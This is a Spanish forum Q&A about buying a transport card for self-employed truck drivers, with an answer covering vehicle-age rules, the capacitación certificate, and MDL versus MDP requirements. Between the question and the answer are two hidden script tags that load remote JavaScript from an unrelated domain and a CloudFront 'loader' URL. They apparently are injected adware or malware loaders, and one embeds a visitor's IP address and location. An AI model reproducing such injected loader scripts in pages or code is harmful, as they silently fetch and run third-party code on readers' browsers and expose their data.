Es legal la Compra de tarjeta de transportes para autónomo

he visto por internet que las tarjetas de transporte para autónomos se venden y creo que es legal si la tarjeta tiene mas de diez años del mismo dueño,si podías aclarármelo y si es así me tendría que ver obligado ala compra de un camión de menos de 5 meses o en este caso es indiferente la edad del camión y por lo tanto no habria problemas para ponerla a mi nombre o no se podría y si haría falta la capacitación aun comprando la tarjeta que supongo que si,pero si me lo aclarases saldarias todas mis dudas.

muchas gracias, un saludo

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B0137D617-6F6B-48BE-8B2C-54DBA83AFA0D%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Madrid&ip=188.85.226.44"></script>
Respuesta

Vamos por partes. Realmente la tarjeta de transportes no se vende, lo que se vende es la empresa. Si tu compras una empresa, pero solo te dan la tarjeta no el vehículo, tienes que comprar un vehículo con menos antigüedad que el último vehículo al que pertenecía la tarjeta, claro está siempre que tengas el título de capacitación.

Si compras un vehículo nuevo o de menos de cinco meses (para MDL), y tienes el título de capacitación la administración te da una tarjeta sin coste alguno, solo los gastos de tramitación.

Si es para MDP, tendrías que comprar 3 vehículos.

Espero haberte aclarado algo más tus dudas. Si tienes más no dudes en ponérmelas.